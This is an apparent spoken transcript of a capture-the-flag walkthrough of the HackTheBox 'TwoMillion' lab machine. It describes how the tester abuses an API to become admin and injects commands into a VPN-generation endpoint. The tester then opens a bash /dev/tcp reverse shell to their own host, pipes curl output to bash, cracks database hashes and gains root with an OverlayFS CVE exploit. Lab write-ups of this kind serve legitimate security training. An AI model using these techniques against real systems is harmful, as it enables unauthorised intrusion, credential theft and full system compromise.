What's going on YouTube? This is Ipsec. I'm doing 2 million from HackTheBox, which got its name because it's the celebratory box for hitting 2 million users on the HackTheBox platform. It's an easy Linux machine that I'm going to attack this blindly. I haven't solved this machine before, so I don't want to spoil it in the intro. Let's just jump in. As always, I'm going to start off with an nmap, so -sc for actually, hold off a bit. I have not actually solved this box yet, so we're going to do -p- first. This is going to do all ports 1 through 65,535. I'm going to add a min rate of 10,000 packets per second. So this should take around 7 to 10 seconds to do a full port scan. I normally don't show this in videos just because scanning this quickly can crash a few devices, most notably like home routers or printers, just really cheap networking devices. But on a CTF, it should be fine. It's super handy to get a full port scan very quickly. We'll do OA to output all formats, put in the nmap directory, call it 2million-all ports. I'm going to add a -v so it shows me open ports as it finds it, and then 10.10.11.221, which is the IP address of the box. So running it, we can see 2 ports open right away. There's some delays because it dropped probes, but looks like only 2 ports are open. It took 8 seconds to run, or 7.98 to be specific. So I'm going to add a second nmap here. So we do -sc for default scripts, sv enumerate versions, OA output all formats, put in the nmap directory, call it 2million. And I'm going to add the -p flag to only scan port 22 and 80 on 10.10.11.221. And while that goes, we can take a look at the page. So I'm going to go to 10.10.11.221, and it redirects us to 2million.htb, but this time the number 2. So let's add this to our host file. So sudo vi etc host and 10.10.11.221, put this in. And I'm actually going to rerun the nmap now that I have the host name. And the reason why I'm doing that is because some of the nmap scripts will only run if you have the host name. So the one in particular I'm worried about that I've been bit before is it finding .git for me. Because everything's redirected to 2 million, it's trying to go to 10.10.11.221/.git. It would redirect to 2million.htb and not find it. So if I have the host name there, and then when that script runs, it would correctly go to 2million.htb/.git. And if it exists, it would find it, right? So let's refresh the page now that we've been there. And we can see it looks like the HackTheBox page, at least how HackTheBox used to look like when it launched. So the very first thing I'm going to do before we go down the nostalgia road and check it out is start up a Pharaoh Buster. We can see a few more things between adding the host name. This one just says HTTP engine X. We have engine X. We see it's a PHP session ID, and we get the HTTP title. So now we know the website's PHP. But I'm going to run Pharaoh Buster on this site. I think it's just -u for URL, HTTP 2million.htb. Is that going to start? Let's see. Could not connect. Oh, it's the number 2. And there we go. Looks like Pharaoh Buster is off to the races. So I always like having some type of recon running in the background. So if I get stuck or anything like that, go back and reflect on the recon. There is a login, so that's where I'm going to start. So clicking on login, I'm going to try admin at 2million.htb. We can make this a bit bigger for you. And I'm going to try password of password. And let's see. I guess because I am running Pharaoh Buster, the web page is going a bit slower. We get user not found. So if I do admin at hackthebox.eu, I know it's .com nowadays, but back then it used to be .eu. We also get user not found. I'm going to try to create an account so we can identify if we can even enumerate valid users. So I'm also going to see, does cross-site scripting work here? Please subscribe. I think it does. Nope, it does not. So that is HTML any encoded. Not that this would really be that handy. It's just, I always like putting reflective XSS whenever I do find it on a report. And if it's easy to test for like that, mine as well, right? So let's go back to 2million.htb. I'm going to click join HTB. And ooh, this is definitely nostalgia. We have the invite code. So I'm going to, well, not cheat this time because long story short, when I first joined HackTheBox, I had a little bit of trouble solving this, but now I think I am good enough to do it. So I'm going to look at the network tab real quick, refresh the page, and we can see it makes a request to 2million JS invite min.js. So this is probably the invite code. I'm going to go to debugger. We can look at this and then try to prettify it. That is still obfuscated. Let's see. If I copy this and do JS-Beautify, this should deobfuscate as well. So paste this, beautify. It did not. Let's see. Copy URL, paste. It's just one line like this. There we go. I guess I didn't like it being split up, but this super easy to read. We have two functions. We have verify invite code and make invite code. So this is going to send a post request to API v1 how to generate and then log the response. We could either just do this through curl. So if I curl-x post, and this needs to be a capital X, 2million.htb. That's not what I want. Curl x post 2million.htb. Let's see what happens here. We get some JSON back. I can do jq dot to prettify this up a little bit. And this is telling us it is rot13. The other thing we could have done, because this is creating JavaScript, we could go back to a web browser, go to the console, and just run the function make invite code. Oh, here we go. Object. And expand this, and we can see the data here, right? So I'm going to copy this, and then I'm going to go to CyberChef. And we're going to put input, rot13, paste it, and it says, in order to generate the invite code, make a post request to API v1 generate. So I'm going to copy this, and I'm going to paste. Whoops. Curl-x post 2million.htb. I'm going to do Control-Shift insert. Is it just Shift insert? Let's just recopy this. I don't know why I'm having such time, like a hard time with my clipboard right now. No, there we go. So we send this, and we can prettify it if we wanted to, and get the code. We can copy echo base64-d and get the invite code. I guess we could, let's see. So if I do jq dot data, is that going to print data? Dot code. We'll do -r for raw to get rid of those quotes. It's taking its sweet time to generate this. But we can also do it this way if we don't want to do any copy and pasting. I don't know why I did that, but I always love playing with JQ when I can. And, ooh, we had an error. I wonder if we need like a -s and -q to hide that, right? Like the total receive, whatever. If that got parsed into base64, I'm just saying. That looks good. Base64-D. Is this going to work now? There we go. And if you really wanted to, you could put an echo on the end of that so it prints a new line afterwards. But we have our invite code. So we can copy this. then go to the page, invite code, sign up. Wonder, let's see, an error occurred. Okay, let's sign up. I wonder if I need to turn Farabuster off, or we just need to wait. There we go. We can log in. So I'm going to do ipsec root at ipsec.rocks, password of password. And then let's register for the site. And then we can log in. If it doesn't log me in automatically, I'm going to go back to the login endpoint and see if it says the email is valid, right? So we can do root at ipsec.rocks. I'm going to put please subscribe, which is not really my password. I'm going to click login. And I want to see if it says password invalid. Because before we were saying the user doesn't exist, right? So this would tell us if we can enumerate valid usernames. We still get user not found. If I click this, nothing happens. So let's just log in. Root at ipsec.rocks, password of password. Click login. I probably should have clicked remember me. I always forget to click those boxes. But now we are logged into the platform. And this looks very similar. We can see we are just over 200, I guess that's 2 million. Let's see. 1, 2, 3. Yeah, just over 2 million users now. So let's click around to see what we can do. I'm looking at the bottom left of my screen as I highlight over things to see where it redirects me to. We have a changelog. Rules just went to /home, so it didn't really bother me too much. Looks like an old changelog 5/9/2017. Maybe right now I'm thinking we should be doing like old exploits that go all the way in 2017, right? Just because that's where we see these changelogs. The site hasn't been updated since then, apparently, on this box. Looking at the links, everything's just going to the anchor. So the link's not changing. Access does change. So I can check out the access page. And then I want to check out machines and challenges as well. Internal server error. Let's try this again. I really think Farabuster is causing some issues because everything is getting a 500 now. Well, I guess not everything, but lots of things. So if we get another one, I will just kill that. This is kind of why I like GoBuster sometimes and not Farabuster, because how long this can run. And if you're doing it on just a single machine and trying to run in the background, if you don't lower the threads or something, it can definitely crash things because I don't know why tools like running as fast as they possibly can, but they do, right? But that rant is over. Just because you can run fast doesn't mean you should. We got challenges, nothing, and nothing here. So it is exposing something here. If we click regenerate, let's see what it gives us. We do have a domain, edgeeufree1.hackthebox.eu. So we could take a look at that domain. I'm going to save the VPN file and let's cd HTB 2,000,000. Move downloads, ipsec here. Let's look at this VPN file. It's going to try to connect to this URL. So let's grep to out of ipsec 2,000,000. I'm going to put this in my host file. I'm going to see if a VPN server is up and if anything resolves after hitting it. I think that Farabuster update my screen is stopping me from highlighting things. Sudo v etc host. Paste this in. And let's do sudo openvpn ipsec.ovpn and see if we can connect. It looks like it's attempting to connect to 10.10.11.221 on port leet, but it's not getting anything. So I don't think this is going to be anything interesting. Let's now send this over into Burp Suite and see exactly what these requests do. So I'm going to click on regenerate, send that in repeater. And I'm also going to click connection pack, send it into repeater. We can look at these two. So connection pack, we can label it. Connection pack is going to go to API v1 user VPN generate. And this is regen. And it's just going to go to VPN regenerate. So the verb there in the last thing changes. Something else is changing here. Image. Let's see. Let's just put these on separate lines because I cannot eyeball exactly what changes. That. Nothing's changing. I guess this bar is changing actually, and that's why it's different. Okay, that makes sense. So if we send this on both, what do we get? And is Farabuster still running? Probably. It is. I'm just going to Control-C this. Generate gives us the... Well, both of them give us VPN information. So I wonder if there's anything else we can do in VPN. If we just hit VPN, we get moved permanently to 404. If we hit user, 404. If we hit user with nothing, API v1. So if we hit API v1, we're actually going to get a list of routes. So I'm going to do this with curl, 2million.htb API v1 jq dot -s -q. I guess we need our header. So let's copy this. There we go. So this is going to be the routes that we can access. Okay, so we've already known how to generate and invite generate. We didn't do invite verify. We can do API v1 user auth. And we see I'm logged in. I am not an admin though. So maybe when we generate an account, we may be able to add the flag is admin and do some type of mass assignment vulnerability. So let's log out of here and try that real quick. Log out. Turn off. Log out. So where's join? Join HTB. I wonder if I can just hit register again. Sweet. I wonder if this will let me get an account. Username. We'll say, please subscribe. Please subscribe. We'll just do admin@ipsec.rocks. Password of password. And this time, we're going to intercept the request. Register. We got code, password, and I'm going to say is_admin equals 1. Shoot. Sweet. What I was testing there is if when I click log out, my PHP session was actually invalidated. Because I logged out, the session should be killed. A lot of times in applications, I'll see them just tell the browser to get rid of the cookie, but keep the session on the server. And of course, that's a finding, right? So that's what I've verified there. I left the cookie, refreshed, and we got message false that I wasn't authenticated. But let's go back to the proxy tab. I'm looking at is_admin is equal to 1. Okay, forward. I got to get an invite code first. Can't take a shortcut. So let's go back. And let's see. Curl, let's see, invite. Let's see. Dot data. There we go. That's from a different box. Which pane did I do this on? Was it here? Yeah. There we go. Sign up. Username. Please subscribe. Password of password. And of course, intercept this request. And is admin equals 1. Forward it. And let's log in. So our username was admin at ipsec.rocks, password of password. So now I'm going to get my cookie here. So this PHP session ID. And we're going to go back to repeater. Paste this. The cookie didn't change, oddly enough, but isAdmin is still 0. So that did not make me an admin. So let's look at other things we can do. VPN generate we saw, VPN regenerate we saw. We didn't see download, but that's just going to download an OVPN file. I guess we could hit it just in case, like, trying to think. It wants us to give a parameter, and maybe there's like a file disclosure vulnerability. Method not allowed. Let's do get. Oh, no, it's just downloading the VPN. So that's not going to do anything. Register, we've already looked at. Admin auth. Let's see. I guess this one was user auth. So if I do admin auth, also a get request, message false. So it's just going to tell me if I'm an admin. We have a update thing. The VPN generate, I'm just ignoring that because that's probably the same as user, but we can update user settings here. So what if we hit this URL? And it was put, right? Yep. So let's see. Message, invalid content type. So content type, we're doing XURL form encoded. It probably wants JSON, honestly. And it wants a parameter email. So let's do admin at ipsec.rocks. And we want another parameter. So we can do is admin 1. Okay. So this is going to be IDOR vuln. I think this is like an IDOR vulnerability. Okay. So next thing we can check is admin auth. Get. And I am now an administrator on this box. So I wonder if I can hit other things. So if I hit API v1 now, it still looks the same. So I wonder if I hit a post on this, if anything changes. Get this post, missing parameter username. So let's add a name. We can do user. I'm going to call it does not exist just to see what happens. And if you're not getting that missing parameter username, remember content type here. I didn't have to specify that because I'm working with a request that had that. Looks like we can request it with any username, like does not exist unless they put that in the box. Huh. Okay. So I'm going to guess there's a command injection vulnerability in here. Like maybe they're generating the VPN by executing just the bash scripts to do it. So I'm going to add a sleep statement here. And we see it's taking half a second to respond. I add the sleep too, and definitely takes longer. I didn't expect 4 seconds. Maybe it actually executes this twice. But we can actually get a shell here probably. So bash-c, bash-i, dev tcp 10.10.14.8. Ooh, I am not 10.10.14.8 anymore. 10.10.16.3. 9001, 0 and 1 like that. I wonder if we have to URL encode this. Maybe not because we're in JSON. Nope, we don't. Sweet. We are on the box. Python 3, import pty, pty.spawn, bin bash. And then let's do control Z, stty raw minus echo fg. Okay. Export term is equal to xterm. Clear the screen. And we are dub data. So the first thing I always do, try to get a password out of this. Let's see. DB name. Is it an environment variable? Looks like it is. We have DB username admin, password of super duper pass. So is MySQL on the box? Which MySQL it is. So MySQL-U admin-capital P. If I can spell MySQL correctly. Lowercase p for password. Copy, paste. Show databases. Use HTB prod. Show tables. Select star from users. And we have 2 users, or 2 we created, and then TRX and the CyberGeek. I'm not sure if we'll be able to crack these passwords, but I guess it doesn't hurt to try, right? So SSH Kraken. I want to say this is like bcrypt, so I wouldn't expect to crack these because this is going to take a while, but vhashes / we'll call this 2,000,000, paste, and we'll copy this one as well. Let's see, /hashcat, bin, hashes, 2,000,000, opt, word list, rocku.txt. And let's just see exactly how long it thinks it's going to run. And let's see. I'm going to guess this is mode 3200. We could probably check the source code to be positive. A good way to do this is let's go back to hashes 2,000,000, and we're going to take a password we know because I made this one, right? This password is password. I'm going to put it in there. V temp pw. I'm just going to write password there. Let's see. Temp pw. I'm going to try. Oh, we need to do -m 3200, don't we? It was 3200, I think. Yeah. I did put it in. Done. So let's just initialize the backend. This should take all of 5 seconds once it starts, and we'll get confirmation that this is mode 3200. There we go. We have confirmation. We are on the right mode by cracking something we knew. So now I can do opt word list rocku.txt and let this go. I'm going to make a note that this is Kraken, and then we can send this to pane 2, and work on this. So nothing in MySQL. Let's see, cat etc pass wd, anything that ends in sh. Admin does exist. So we can probably switch that user. There we go. To run a command as sudo, so sudo-l, we may not run it. Let's see. I'm going to check if there's anything interesting in my home directory. Doesn't look like there is. We can do find -user admin. We're going to do / to find everything. And this is going to show me files owned by admin. And we probably want to get rid of run, proc, and sys. I'm going to do grep-v. Anything that begins with /run or /proc or /sys. And not much. There is mail. Cat var mail admin. Let's see. From chat to the admin and CC and Goblin. Hey, admin, I know, or working as fast as you can do DB migration, partially down, upgrade the OS on a web host. Few Linux kernel CVEs. One is in OverlayFS. We can't get popped by that. The HTB Godfather. Let's check uname-a, and we can see we are from 2022, so this is definitely an old kernel. So let's see. If I Google OverlayFS 2023, we probably should turn Burp Suite off. I'm going to add GitHub to that as well. Let's see, maybe privesc. Datadog has it. Let's see, exploit DB, OverlayFS, all 2019. This is 2023. So let's see. Is there a proof of concept? Background. How the exploit works. Analysis of patch. Let's see. Detecting. I don't see a proof of concept. So we're ID. So if I run ID here, admin, I'm going to run this command, unshare user map user 0. Wait, I'm root. Awesome. So that is not exactly the box, because I can't get into /root. User inheritance. So if I execute bash, bash-p, well, we're close to solving this box, I think. When we did the unshare, it looks like everything is now nobody, which I'm guessing is not a good thing. So unshare -- user map user. Not exactly sure how that worked. Here's a proof concept. This seems sketchy. Let's see, is GCC on this machine? It is. So let's download it. So HTB 2million, get clone, download this. And let's see, I'm going to tar cjvf cve.tar.bz2, make this, make dir dub, move this into dub, python 3-m HTTP server, wget 10.10.16.3 8000 CVE 2023-0386 tar bz2. Then tar xjvf. Go in here. Make. And let's see. If I run this, see how long this takes. See, can I go translate.google.com, paste this in, now go here, start two terminals. In the first, enter this, and the second. That definitely helps. Let's see. Grab this password. sh_admin at 10.10.11.221. Yes. Paste in the password. cd, it's just cdcve /exploit. Run it. ID. Well, now I don't see all the nobodies. So now if I go to /root, I can see root.txt. And we also have thankyou.json. Oh, God. So let's just, I guess, download this file. Did I kill this? No, I did not. Actually, instead of downloading, I'm just going to copy it. Then let's do v thankyou.json. I put in my tmux history. There we go. So I can cat thankyou.json, pipe it to JQ. And let's see, what is this doing? Encoding URL. So let's URL decode this. Copy. We have CyberChef open, don't we? CyberChef. Go here. And then let's do URL decode. Now it's hex encoding. So paste this. Hex from hex. This is XOR. Encryption key is HackTheBox, and it's also base 64 encoded. So let's copy the base 64, paste. Let's do base 64, and then XOR. We want HackTheBox. Oh, we can get rid of this base64 and specify base64 here. Or not. That does not look right. Run this. Let's see. Latin, UTF, binary. Is this base64 as well? Oh, shoot. I did 2 base64. Does Control Z work? From base64. There we go. That's it. That was a stupid error, but here we can see a letter thanking us for Hack the Box, right? But that's not going to be the video, right? It's not really a Hack the Box machine until you dive deeper in the machine and try other things. When I was doing this machine, I have 2 things I was thinking in the background or in my head. I wonder if the invite code could be done through type confusion. And I'm also wondering if like the username parameter requires only alphabetical. Like, could we skip the whole IDOR vulnerability, upgrading ourselves to administrator if we just put the code execution in our username and then generate a VPN cert? So I'm going to go back to the machine. So we're going to log out. I'm going to go join HTB, and we have this invite code challenge. So I'm going to do burp suite. We'll do please subscribe so we can intercept this. Sign up. And if we just send this code, we get code is invalid. So we're going to change the application what it accepts. And I'm going to specify JSON. And we're going to say code is please subscribe. And it's missing parameter code. So it doesn't look like this is going to work, right? Let's see. Content type, application JSON. That's what we had here, right? Yes. So I don't think we can do any type juggling here, unfortunately. So let's create a invite code, or maybe we can, let's see, do we have any registration? We don't. So let's go back and get our invite code. Let's see, JQ.data. Here we go. Got an invite code. We can register. And the username, we'll do IPSEC. And then I'm going to make sure curl's on this machine, right? So which curl, it is 10.10.16.3, I think was my IP. Yes, 10.10.16.3. And we'll pipe over to bash. And we'll say beyond root at ipsec.rocks, password of password. And we're going to click register. And beyond root, password. So we can see what a username is here, right? So let's stand up a web server. So sudo nc lvmp 80. Go to the access page. Regenerate. And it does not look like it worked. Because we ipsec curl whatever. So maybe it's stripping special characters there. We could probably look at the code. So now that we're root on the box, or we could have done it as www data or something. Go to the code. Let's see. What is this endpoint? It was v1 user auth. grep-r user auth. No, it was VPN generate. Okay, let's check this code out on API controllers. Let's see. Generate. This is on get routes. So I don't think it's here. What else is there? It's probably under controllers, but there is this VPN directory. What is VPN? gen.sh. So this is probably what's generating the VPN. Cat VPN gen.sh. Username. So yeah, so it's calling probably gen.sh, putting the username here. And that's where it does the code execution. So grep-r gen.sh. Okay. So how is this working? So it's just going to call bin bash. So we want to see where regenerate user VPN. I click this, right? I didn't just click download. Yeah. I definitely clicked that. Grep regenerate user. Let's see. So an index. Still in this file. Generate user. Let's see, we're logged in. Oh, there we go. We got remove special characters. So this is why when we're doing it through the user, we can't do code execution because it's removing special characters, and in whatchamacallit, the admin function probably doesn't call this. So what is remove special characters? So we're going to replace spaces with this dash, and guessing make sure it's only that. So what we can do is copy this, then php-a. Let's see. Let's call string is equal to curl 10, 10, 14, 8. Pipe it over to bash. Echo string. So now let's run this str replace. So this is going to remove all spaces, which is fine. I think we can still perform this exploit without spaces. Let's see what happens with this. So that's going to trim off anything that doesn't begin with a numerical character. So if we put like a pipe or backticks, it's not going to work. So we do this. We call this echo string. That doesn't work. We could try a semicolon. Whoops. So we set that. We call replace. Echo it. That doesn't work. The other things you could do is like a backtick, but again, we've already looked at the regex, so we can see how they sanitize that. So we didn't really actually gain that much from doing this beyond root, but we do have an idea of what we could do to help prevent any type of exploit. Not that it's going to be the greatest thing, but then you can talk to people after you solve this machine and see if they found a way around this. And maybe you'll learn something that you can take on to another box. I just can't stress enough how good it is to do all the beyond roots and just go beyond the box, explore it. And yeah, that's going to be the box in the video. So hope you guys enjoyed it. Take care, and we'll see you all. Actually, I lied. In the spirit of doing beyond roots, there is one step that kind of was a crutch, right? Let's go back. When we were just doing this box, we did like a find command on the user and found that mail. What if we couldn't find that mail, right? What if there was no email from Chap to Goblin telling them to update it? How would we have found this vulnerability? And that's where beyond roots come in, because we know it is vulnerable. So I'm going to run linpeas against this. And I honestly don't think linpeas is going to find this because it's a relatively recent kernel exploit. And linpeas isn't the quickest to add these kernel exploits. So let's go here, peas-ng. We can go download this 3 days ago. It's been updated, so maybe it will find it. Taking bets. We can exit this pane. Let's see. CD dub move downloads linpeas. We can curl 10.10.16.3 8000 linpeas.sh, pipe it over to bash. We have to start our web server. And I'm going to let this run and pause the video while it runs, and then we're going to look for the kernel privesc of OverlayFS. Okay, so now that linpeas is done, I'm going to look back at bash, and we're going to go down this list, right? So the very first hint is right here. Under basic information, we see the kernel was built September 23rd of 2022, which is like 9 months ago, I think. Like this is an old kernel, so we should know that we can do something, right? If we keep going down the list though and look at the exploit suggester, it's not suggesting this, right? We have CVE 2022 32250, like did not suggest this. So let's look at Linux exploit suggester and see when it was last updated. So ZLabs, Linux exploit suggester, searching for it, 2022. So I wonder if there's a pull request for this vulnerability. So if we look at pull request, 2022, 2021, we don't have anything for this. Please help me, fixing a typo. So nothing in issues either. So we should try to figure out exactly how Linux exploit suggester works. And I'm going to do that in another video. So I'm going to wrap this video up, and we're going to do a separate video on looking at exactly how this works, because I don't want to do it live, and I'm guessing this is going pretty long. So sorry for the cliffhanger, but I promise within a few days, the video will be up on adding OverlayFS to this. So Take care, guys. I will see you all next time.